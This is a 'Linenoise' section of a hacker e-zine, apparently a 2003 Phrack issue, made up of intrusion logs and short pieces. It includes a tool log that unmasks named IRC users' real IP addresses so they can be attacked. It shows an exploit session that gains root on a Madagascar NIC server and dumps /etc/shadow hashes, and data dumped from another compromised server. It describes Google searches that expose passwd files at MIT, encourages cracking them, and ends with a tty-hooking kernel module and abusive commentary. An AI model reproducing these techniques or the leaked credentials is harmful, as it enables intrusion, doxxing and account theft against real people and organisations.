==Phrack Inc.== Volume 0x0b, Issue 0x3f, Phile #0x03 of 0x0f |=-------------------------=[ L I N E N O I Z E ]=------------------------=| |=------------------------------------------------------------------------=| |=----------------------------=[ phrackstaff ]=---------------------------=| Everything that does not fit somewhere else can be found here. Corrections and additions to previous articles, too short articles or articles that just dont make it, funny hacklogs....everything. |=[ 0x01 ]=---------------------------------------------------------------=| Finding the Whitehat - an0nym0us This brief user submission shows the lengths that some people will go to find the real IPs of known whitehats so that they can then be owned and rm'd. Enter the whitehat anti-witness protection program. Here's what happens to snitches on the net: root@mallory:/ezbake# ./burn `cat plaintext/netric-org.new2` /* cool awesome hacker header censored by pstaff */ Round 1 - Hamming distance: 22 - k0: 0x97c80e49 k1: 0x81c4058b k2: 0x79f481f2 Round 2 - Hamming distance: 18 - k0: 0xf0e28106 k1: 0x4861ad99 k2: 0x5f405d15 Round 3 - Hamming distance: 15 - k0: 0x0984e0b9 k1: 0xd1983d94 k2: 0x68042d31 Round 4 - Hamming distance: 14 - k0: 0x0984e0b5 k1: 0xd1983d90 k2: 0x68042d2d Round 5 - Hamming distance: 12 - k0: 0x4904e0b5 k1: 0xd1183d90 k2: 0x68042d2d Round 6 - Hamming distance: 11 - k0: 0x2984e0bd k1: 0xb1983d70 k2: 0x68042d15 Round 7 - Hamming distance: 9 - k0: 0x4884e0b0 k1: 0xd0983d9b k2: 0x68042ca9 Round 8 - Hamming distance: 8 - k0: 0x0804e0c0 k1: 0x90183d5b k2: 0x68042d39 Round 9 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39 Round 10 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39 Round 11 - Hamming distance: 6 - k0: 0x0804e0ce k1: 0x90183d45 k2: 0x68042d39 Round 12 - Hamming distance: 5 - k0: 0x4804f0cc k1: 0xd0183c87 k2: 0x68043d79 Round 13 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 14 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 15 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 16 - Hamming distance: 3 - k0: 0x4808f0ce k1: 0xd0103d85 k2: 0x68083c79 Round 17 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79 Round 18 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79 Round 19 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 Round 20 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 Round 21 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 MATCH: 0x0000d0ce 0x00007d85 0x00005c79 >> w0a, str0ng keys, especially the most significant word ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | eSDee (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) (unknown) ³ ircname : eSDee | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) | operator : eSDee (is NOT an IRC warrior) | help : eSDee - is available for help. | eSDee was (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) root@mallory:/ezbake# ./burn -d 2EC0E90E.914AD78D.7FC28CE1.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 213.201.176.198 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Laurens (~laurens@DD81E3B.D2642F0E.15F667A0.IP) (unknown) ³ ircname : laurens | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) | operator : Laurens (is NOT an IRC warrior) | help : Laurens - is available for help. root@mallory:/ezbake# ./burn -d DD81E3B.D2642F0E.15F667A0.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 81.17.46.157 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Tex (~Tex@398AD8F4.5D1F7852.16B25093.IP) (unknown) ³ ircname : Tex - Representative of Shadows | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 1 hours 24 mins 57 secs (signon: Tue Sep 23 17:16:13 2003) root@mallory:/ezbake# ./burn -d 398AD8F4.5D1F7852.16B25093.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 213.214.43.116 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Argv[] (~argv@2ECA21BE.36EC7F5.1BE1D223.IP) (unknown) ³ ircname : "Survival of the fittest." -- Darwin._ | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 15 mins 25 secs (signon: Mon Sep 22 20:09:56 2003) root@mallory:/ezbake# ./burn -d 2ECA21BE.36EC7F5.1BE1D223.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 193.77.159.230 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | [Elwin]-gone (~Elwin@2E9E2501.725E068F.50F7261E.IP) (unknown) ³ ircname : http://Elwin.ChatValley.nl | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 17 mins 53 secs (signon: Mon Sep 22 20:09:52 2003) root@mallory:/ezbake# ./burn -d 2E9E2501.725E068F.50F7261E.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 81.171.2.188 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | newroot (~seprioth@29A5FFF4.46779EFE.7026342B.IP) (unknown) ³ ircname : seprioth | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 1 hours 1 mins 21 secs (signon: Tue Sep 23 18:26:43 2003) root@mallory:/ezbake# ./burn -d 29A5FFF4.46779EFE.7026342B.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 212.6.91.195 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | h4x0r (~kiss@39C0CF3C.EC41C18A.37392DA9.IP) (unknown) ³ ircname : Level Seven Digital | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 18 mins 43 secs (signon: Mon Sep 22 20:09:39 2003) [+] 219.101.83.40 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | feeble (~null@25E7EE98.668A5C0B.75AA0ACB.IP) (unknown) ³ ircname : null | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 17 hours 0 mins 42 secs (signon: Mon Sep 22 20:09:59 2003) root@mallory:/ezbake# ./burn -d 25E7EE98.668A5C0B.75AA0ACB.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 209.26.65.169 |=[ 0x02 ]=---------------------------------------------------------------=| Ownage log of Network Information Center Madagascar - az14n xtr4v4g4nz4 * EDITOR'S NOTE * : This shit is pretty fuckin gay, and I'm not sure why we included it, apart from filling the void left by a lack of user submissions, but it should give you an insight into how people like s1/ dvdman hack. * * * * * * * * * openssl remote apache juarez!@# [+] SSL k0nn3kti0nz cipher: 0x405a454c ciphers: 0x81227b8 Session: 0000 - e6 35 88 5b d9 e8 23 15 fe 5d e7 6b 44 b7 d8 4d 0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0020 - 20 00 00 00 63 35 30 32 30 39 37 30 62 35 38 35 0030 - 32 38 64 33 31 61 30 31 33 32 33 62 34 36 63 36 0040 - 64 38 35 66 00 00 00 00 08 84 12 08 00 00 00 00 0050 - 00 00 00 00 01 00 00 00 2c 01 00 00 b3 87 d6 3f 0060 - 00 00 00 00 4c 45 5a 40 00 00 00 00 b8 27 12 08 0070 - check your addr and hit enter using 100 threads using retaddr 0xbffffd00 using retaddr 0xbffffc00 using retaddr 0xbffffb00 using retaddr 0xbffffa00 using retaddr 0xbffff900 using retaddr 0xbffff800 read: Connection reset by peer using retaddr 0xbffff700 using retaddr 0xbffff600 connected using addr 0xbffff54c bash: no job control in this shell bash-2.05$ bash-2.05$ uname -a; id; w; Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache) bash: /usr/bin/w: Permission denied bash-2.05$ bash-2.05$ *** Few sekz l8r after d0wnl04d1ng s0m3 shietzniT *** bash-2.05$ ./aa sh-2.05# id uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin) *** Few sekz after ex3cut1ng s0m3 "too1z" *** The authenticity of host 'ns.nic.mg (62.173.234.149)' can't be established. RSA1 key fingerprint is dc:cd:da:72:fe:6e:db:70:ff:11:e5:cc:b4:27:80:80. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'ns.nic.mg,62.173.234.149' (RSA1) to the list of known hosts. root@ns.nic.mg's password: Last login: Tue Dec 9 11:30:41 2003 from 194.214.107.63 No mail. WARNING: Your password expires in 11 days [root@ns root]# uptime; id; uname -a 6:32am up 40 days, 18:46, 0 users, load average: 0.00, 0.00, 0.00 Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin) [root@ns root]# ls -a /var/named ./ 194.214.107.rev com.mg isoc.mg mg20031112 mil.mg net.mg org.mg save/ ../ asso.mg edu.mg mg mg.20031118 named.ca nic.mg prd.mg 127.0.0.rev co.mg gov.mg mg_20031028 mg.20031127 named.local nic.mg.db root.hints [root@ns root]# cat /etc/shadow root:$1$b1HQyHcU$3nSVn8nT/EwJoGZzo/k8G/:12347:0:60:7:30:-1:1235198 bin:*:11869:0:60:7::: daemon:*:11869:0:60:7::: adm:*:11869:0:60:7::: lp:*:11869:0:60:7::: sync:*:11869:0:60:7::: shutdown:*:11869:0:60:7::: halt:*:11869:0:60:7::: mail:*:11869:0:60:7::: news:*:11869:0:60:7::: uucp:*:11869:0:60:7::: operator:*:11869:0:60:7::: games:*:11869:0:60:7::: gopher:*:11869:0:60:7::: postgres:x:11869:0:60:7::: ftp:*:11869:0:60:7::: squid:x:11869:0:60:7::: gdm:x:11869:0:60:7::: htdig:*:11869:0:60:7::: dhcpd:*:11869:0:60:7::: named:*:11869:0:60:7::: postfix:*:11869:0:60:7::: snort:x:11869:0:60:7::: nscd:x:11869:0:60:7::: rpm:*:11869:0:60:7::: apache:*:11869:0:60:7::: rpcuser:*:11869:0:60:7::: rpc:*:11869:0:60:7::: sympa:*:11869:0:60:7::: gica:*:11869:0:60:7::: ldap:x:11869:0:60:7::: vpopmail:*:11869:0:60:7::: alias:*:11869:0:60:7::: qmaild:*:11869:0:60:7::: qmaill:*:11869:0:60:7::: qmailp:*:11869:0:60:7::: qmailq:*:11869:0:60:7::: qmailr:*:11869:0:60:7::: qmails:*:11869:0:60:7::: dnscache:*:11869:0:60:7::: dnslog:*:11869:0:60:7::: tinydns:*:11869:0:60:7::: axfrdns:*:11869:0:60:7::: nobody:*:11869:0:60:7::: xfs:!!:11869:0:60:7::: mysql:!!:11869:0:60:7::: ramboa:$1$JmsNoIyT$btZ6ua/K/yYJiLnVUQYLP1:12347:0:60:7:30:-1:3270910 sshd:!!:11870:0:60:7::: haja:$1$geO6qeHQ$Qr6LI21blDXgQgPTsBYll0:12061:0:60:7:30::1075898622 raft:$1$n7TZ4rYD$ES9PKofmF1BsKbqxJK/UG0:12167:0:60:7:30::3270910 [root@ns root]# [root@ns root]# [root@ns root]# exit Connection to ns.nic.mg closed. |=[ 0x03 ]=---------------------------------------------------------------=| IRC.NAC.NET Operator Gets Owned - anonymous aggressive irc dude * EDITORIAL INTERJECTION: While this log wasn't exactly what we would call a pinnacle of achievement in terms of hacklogs, we edited some of it out and left the slightly amusing/interesting parts * #do this to restart spammer "not only is he an oper but a spammer" cat q-read | grep local | sort | uniq -c | sort -nr > mail-to cat q-read | grep "<" | tr -s ' ' | cut -f8 -d' ' | sort | uniq -c | sort -rn > mail-from zvv261.com moneysaversx.com members.mdmedia2.com bmw1967.com gonetdeals.com yourbigfun.com wotch.com email.com dlbnetwork.net rbexpress.org optindeals offers- selectmediagroup.com good-karma-inc.com zvv261.com latinababes livenlearn13 kibitzers-return joke-of-the-day-return- ... qmaild 137 0.0 0.0 920 528 con- S 8:45AM 1:05.18 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.69 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd root 139 0.0 0.0 920 528 con- S 8:45AM 3:17.08 /usr/local/bin/t cpserver -v -R -H -c150 207.99.0.69 pop3 /var/qmail/bin/qmail-popup mercury.nac. net /var/qmail/bin/checkpoppasswd /var/qmail/bin/qmail-pop3d Maildir root 1422 0.0 0.0 932 568 ?? S 8:45AM 0:36.46 /usr/lib/courier -imap/libexec/couriertcpd -address=207.99.0.69 -stderrlogger=/usr/lib/courier-im ap/libexec/courierlogger -stderrloggername=imapd -maxprocs=100 -maxperip=4 -pid= /var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/lib/courier-imap/sbin/im aplogin /usr/lib/courier-imap/libexec/authlib/authdaemon /usr/lib/courier-imap/b in/imapd Maildir root 13596 0.0 0.0 932 576 ?? S 12:24PM 0:00.29 /usr/lib/courier -imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/libexec /courierlogger -stderrloggername=imapd-ssl -maxprocs=100 -maxperip=4 -pid=/var/r un/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/lib/courier-imap/bin/couri ertls -server -tcpd /usr/lib/courier-imap/sbin/imaplogin /usr/lib/courier-imap/l ibexec/authlib/authdaemon /usr/lib/courier-imap/bin/imapd Maildir root 22240 0.0 0.0 2256 1372 ?? S 4:09PM 0:00.74 couriertls -loca lfd=4 -tcpd -server qmaild 9008 0.0 0.0 920 532 pb- S 6:34PM 0:03.13 /usr/local/bin/t cpserver -R -H -x/etc/auth.rules.cdb -c250 -u 1002 -g 1001 207.99.0.70 smtp /var /qmail/bin/qmail-smtpd-auth smtp-auth.nac.net /var/qmail/bin/checksmtppasswd /us r/bin/true root 57564 0.0 0.0 2256 1508 ?? S 10:13PM 0:00.41 couriertls -loca lfd=4 -tcpd -server root 37381 0.0 0.0 2256 1588 ?? S 10:59PM 0:00.14 couriertls -loca lfd=4 -tcpd -server root 1021 0.0 0.0 1104 792 p0 R+ 11:42PM 0:00.00 grep tcp (bash) qmaild 133 0.0 0.0 920 528 con- I 8:45AM 1:31.38 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 64.21.52.92 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd qmaild 135 0.0 0.0 920 528 con- S 8:45AM 4:24.47 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.26 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd ... Volume in drive C is MAIN Volume Serial Number is 94A4-D96A Directory of C:\ 07/21/2003 08:27 PM 382,006 2003-07-21-weather.bmp 06/26/2003 05:19 PM 44 800 fiasco.txt 05/21/2003 01:41 AM 9,569 agreement between joel tew and NAC may 20 2003.wpd 06/15/2003 10:37 PM 18,534 AlmostGone.jpg 08/22/2002 02:48 PM 0 AUTOEXEC.BAT 06/02/2003 01:38 AM
<html> <head> </ ... ... <html> <head> </head><body><pre>root:SSpbaftOt8rE6:8573::::: daemon:NP:6445::::: bin:NP ... www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow - 1k - Cached - Similar pages--- Wow, looks like we hit paydirt right here. Hey wait.. I bet it's a dead link or something, lets make sure it works... --- http://www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow root:SSpbaftOt8rE6:8573:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: pop:NP:6445:::::: discuss:NP:6445:::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: --- h0h0h0. Lookz like somone forget to configure their afs server properly! Letz explore a little deeper. --- http://www.mit.edu/afs/athena/system/config/passwd/ Parent Directory 08-Jul-2001 01:18 - rhlinux/ 07-Feb-2000 22:38 - sgi_53/ 26-May-1998 20:40 - sgi_62/ 26-May-1998 20:40 - sgi_63/ 26-May-1998 20:40 - sgi_65/ 22-Apr-1999 01:06 - sun4m_54/ 26-May-1998 20:40 - sun4x_55/ 26-May-1998 20:40 - sun4x_56/ 26-May-1998 20:40 - sun4x_57/ 26-May-1998 20:40 - sun4x_58/ 26-May-1998 20:40 - sun4x_59/ 26-May-1998 20:40 - --- OMG w00t. Lookz like we now have lotza passwords!@ Letz make sure we can acesss them all. --- http://www.mit.edu/afs/athena/system/config/passwd/sgi_53/passwd root:SSpbaftOt8rE6:0:0:Super-User:/:/bin/athena/tcsh sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh daemon:*:1:1:daemons:/:/dev/null bin:*:2:2:System Tools Owner:/bin:/dev/null uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh sys:*:4:0:System Activity Owner:/var/adm:/bin/sh adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh nuucp:*:10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh EZsetup:*:992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh demos:*:993:997:Demonstration User:/usr/demos:/bin/csh OutOfBox:*:995:997:Out of Box Experience:/usr/people/tour:/bin/csh guest:*:998:998:Guest Account:/usr/people/guest:/bin/csh 4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null noaccess:*:60002:60002:uid no access:/dev/null:/dev/null nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null pop:*:50:101:Post Office Protocol,,,,:/var/spool/pop:/dev/null discuss:*:32000:101:Discuss System,,,,:/var/spool/discuss:/dev/null --- Yep! It looks like we can! Letz see what else is on there! --- http://www.mit.edu/afs/net.mit.edu/system/vax_bsd43/srvd.72/etc/passwd root:2pEdLRdD8rMnk:0:1:System PRIVILEGED Account:/:/bin/csh operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh daemon:*:1:1:Mr Background:/: sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys: bin:PASSWORD HERE:3:4:Mr Binary:/bin: --- Jesus, a VAX! It lookz like we've discovered a true digital Jurrasic Parq here guyz!@ Ok now we'll try to google for "root:*:0:0:Charlie", this will find mainly bsd systems. --- http://www.ensta.fr/~perret/Cours/Securite/Ensta/passwd Jesus, I'm not even going to paste this because it's juzt not all gonna fit!@ -- That french one has mad passwords for your hacking adventures but the MIT ones are all root pw'z only. I'd bet pretty highly tho that the main NIS server (or LDAP or whatever they use) is as fucked up as those so you can prolly http:// your way to however many hundred thousand passwords. Even if you can't be bothered doing that then I'm sure there's plenty of kidz out there who have these 3Ghz boxes for playing quake or smt. Use your magination. If you get realjiggy with search stringz then it's possible to turn out shadow files for all kinda of .gov's (nist, lbl etc) and stuff so yea, play around. |=[ 0x05 ]=---------------------------------------------------------------=| p62 Poll - http://www.securitybriefing.com/modules.php?name=Surveys&pollID=2 Survey [pixel.gif] What is your opinion of "Phrack 62"? ( ) Loads of FUD from worthless Black Hats. ( ) Good articles but silly/immature commentary. (*) The best thing I ever read. |=[ 0x06 ]=---------------------------------------------------------------=| p62 Release Announcements Heralded Worldwide - http://www.informit.com/isapi/weblog_id~%7BCEF1DC33-01E0-45D5-8FCA-348DC993AA75%7D/st~%7B4D022936-8769-4F76-9152-F65D036DEDF9%7D/weblog/showComments.asp "Fake" Phrack 62 is out by Seth Fogie - SEP 22, 2003 11:22:24 PM 0 Replies Whitehat, Blackhat, greyhat, or even anti-hat, this edition of Phrack has it all. If you have never heard of Phrack, it is an online publication that has long held the interests of hackers from all types of backgrounds. Phone systems, electronics, traffic lights, and of course the typical computer have all been targeted by Phrack authors. However, in the last week Phrack 62, also being referred to as a fake Phrack, made its debut. While this version definitely had some interesting technical chapters, it provided several not to subtle discussions against the whitehat hackers of the world. Regardless, if you are looking for something that is humorous, technically interesting, and maybe even a little offensive, this version of Phrack is for you! Just dont believe everything you read ---------------------------------------------------------------------- Found cached on www.professionalsecuritytester.net/ Phracks has been released Posted by cdupuis on Sunday, September 21 @ 09:01:06 EDT (2 reads) PHRACK #62 Has Been Released Phrack Magazine is one of the longest running electronic magazines in existence, and certainly one of the most interesting. Since 1985, Phrack has been providing the hacker community with information on operating systems, networking technologies and telephony, as well as relaying features of interest to the international computer underground. The Phrack Magazine team released a new issue of this Magazine, number 62. 1) Introduction - Phrack Staff 2) Loopback - Phrack Staff 3) Linenoise - Phrack Staff 4) Toolz Armory - elguapo 5) Phrack Prophile on shok - Phrack Staff 6) Eye on the Spy - tr4shc4n m4n 7) Local Honeypot Identification - Joseph Corey 8) Look, a Phone Article!! - d0nn1e n4rk0 9) Writing Plan9 Shellcode - m1lt0n 10) Crucial LKMS for All Hackers - warez mullah 11) New Hacking Manifesto - cr4zy c0nsuel0 12) THE PROJEKT MAYHEM TOOLKIT - d0kt0r m4ngl3r 13) Sneeze: Wreaking Havoc Upon Snort - m1lt0n 15) Phrack World News - Phrack Staff Additional Information: The information has been provided by Phrack Staff. |=[ 0x07 ]=---------------------------------------------------------------=| THE LEET SPEAK LKM - KaRELeSS KaRL & warez mullah y0y0y0, f0r 4ll 0f eWe h4cK3rz 0ut there in h4krsp4ce h3r3 iZ a mod 2 make the operating system formerly backdoored by suCKit m0re us4ble for 4ll of eWe el8 h4qrz. r u s1q of using stran9er/swr's tcl kodez to speak like a ku0ldu0d on irc? then this lkm is the anzw3r 2 y0ur pray3rz...... Begin Extraction of el8 k0d3z h3r3 --------------------------------------- #define MODULE #define __KERNEL__ /* By using this code you subject yourself to submitting to our will. You forfeit any and all rights once you have compiled this code. Whitehats please take note that we reserve the right to rm your fat ass if we learn of its usage. Snosoft and iDefense you still have reserve the right to be owned like jobe. Any modifications to this el8 code will result in a prompt rm'ing and death by webcam so we can watch for our own amusement because we fat goths are simply too big to leave our beds. eEye is the root of all microsoft's problems. They are the virii writers that crash your XP machine just as Jenna Jameson catches that load in her eye. Atstake employees take note, we are watching you. Your continued acts of script kiddy'ism will not be tolerated by us or your managers. Further acts will result in PHC release of logs for Atstake Management review. Now get back to cracking those NT Lan Man passwords and SQL injection codes. Oh, and have a Merry Fucking Christmas! */ /* To Compile: cc -c -o whatthefuckever.o -I/lib/modules/`uname -r`/include thisfile.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ONE 1 #define NOTONE 0 #define NOTNOTONE 1 #define THEOISGAY 1 #define BEGIN_KMEM { mm_segment_t o = getfs(); setfs(get_ds()); #define END_KMEM setfs(o); } #define LANCE_SPITZNERS_HOME_IP " " #define BAD_INT int #define GOOD_INT unsigned int #define CHAR char #define SECURE_CHAR unsigned char #define STRUCT struct #define HOWBIGISIT size_t #define system memset #define sys_unlink kmalloc #define printf kfree #define fprintf copy_from_user #define syslog copy_to_user #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9) #ifdef MODULE_LICENSE MODULE_LICENSE("GPL"); MODULE_AUTHOR("Phrack Labs"); #endif #endif char *targetproclist[] = { "epic", "BitchX", NULL }; ssize_t er33t_tty_read(struct file * file, CHAR * buf, HOWBIGISIT count, loff_t *ppos); ssize_t (*o_read) (struct file * file, CHAR * buf, HOWBIGISIT count, loff_t *ppos); void play_with_ttys( void ); void stop_molesting_ttys( void ); BAD_INT init_module(void) { play_with_ttys(); return NOTONE; } void cleanup_module(void) { stop_molesting_ttys(); return; } BAD_INT last_was_leet = 1; void play_with_ttys( void ) { (void *) o_read = (void *) current->files->fd[0]->f_op->read; current->files->fd[0]->f_op->read = (void *) er33t_tty_read; }; void stop_molesting_ttys( void ) { (void *) current->files->fd[0]->f_op->read = (void *) o_read; } ssize_t er33t_tty_read(struct file * file, CHAR * buf, HOWBIGISIT count, loff_t *ppos) { BAD_INT l; GOOD_INT pos; CHAR *er33tbuf; int i; system(buf,0,count); l = (*o_read)(file,buf,count,ppos); if (l < 0) return THEOISGAY; /* added @ the last minute */ i=0; while(targetproclist[i]!=NULL) { if (strstr (current->comm, targetproclist[i])) goto THEO_IS_A_GLORYHOLE_GIRL; } return l; THEO_IS_A_GLORYHOLE_GIRL: er33tbuf = sys_unlink(sizeof(CHAR) * (l+1),GFP_KERNEL); system(er33tbuf,0,l+1); if(fprintf(er33tbuf,buf,l)) { printf(er33tbuf); return NOTONE; } for (pos = 0; pos < l; pos++) { CHAR change; change = 0x00; switch(((*(er33tbuf+pos)))) { case 'l': change = '1'; break; case 'L': change = '|'; break; case 't': change = '7'; break; case 'T': change = '7'; break; case 'o': change = 'O'; break; case 'O': change = '0'; break; case 'a': change = '@'; break; case 'A': change = '4'; break; case 's': change = 'z'; break; case 'S': change = '5'; break; default: change = 0x00; break; } if (last_was_leet) { if (change != 0x00) *(er33tbuf+pos) = change,last_was_leet = 1; } else last_was_leet = 0; syslog(buf,er33tbuf, l); printf(er33tbuf); return l; } } End extraction of el8 k0d3z 2k00l4u --------------------------------------- |=[ EOF ]=---------------------------------------------------------------=|